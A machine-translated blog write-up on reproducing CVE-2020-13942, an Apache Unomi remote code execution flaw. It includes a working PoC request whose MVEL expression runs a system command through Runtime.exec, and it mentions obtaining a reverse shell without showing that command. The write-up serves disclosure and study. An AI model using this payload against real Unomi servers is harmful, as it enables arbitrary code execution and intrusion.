Shulou(Shulou.com)05/31 Report--

Apache Unomi remote code execution vulnerability CVE-2020-13942 how to reproduce, many novices are not very clear about this, in order to help you solve this problem, the following small series will explain in detail for everyone, there are people who need this can learn, I hope you can gain something.

CVE -2020-13942 (Apache Unomi Remote Code Execution Vulnerability)

I. Vulnerability Description:

Apache Unomi is a Java open source platform that is a Java server designed to manage data about potential customers and visitors and help personalize the experience. Unomi can be used to integrate personalization and profile management across very different systems (e.g. CMS, CRM, Issue Tracker, Native Mobile App, etc.).

Prior to Apache Unomi version 1.5.1, an attacker could send malicious requests via crafted MVEL or ONGl expressions that would allow the Unomi server to execute arbitrary code, vulnerability number CVE-2020-11975, and vulnerability CVE-2020-13942 is a patch bypass for CVE-2020-11975, where an attacker bypasses the patch detection blacklist, sends malicious requests, and executes arbitrary code on the server.

II. Impact version:

Apache Unomi < 1.5.2

III. Recurrence of loopholes:

Visit Page Style

POC：

POST/context.jsonHTTP/1.1Host: localhost:8181User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:75.0) Gecko/20100101 Firefox/75.0Content-Length: 486{"filters": [ {"id":"boom","filters": [ {"condition": {"parameterValues": {"":"script::Runtime r = Runtime.getRuntime(); r.exec(\"gnome-calculator\");" },"type":"profilePropertyCondition" } } ] } ],"sessionId":"boom"}

Capture PoC Execution:

View DNSlog records:

Try to bounce the shell:

Execute the bounce shell command script:

Get Shell

IV. REPAIR SCHEME

Avoid putting user data into expression interpreters whenever possible.

At present, the manufacturer has released the latest version, please download and update to the latest version in time. The official link is as follows:

Did reading the above help you? If you still want to have further understanding of related knowledge or read more related articles, please pay attention to the industry information channel, thank you for your support.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.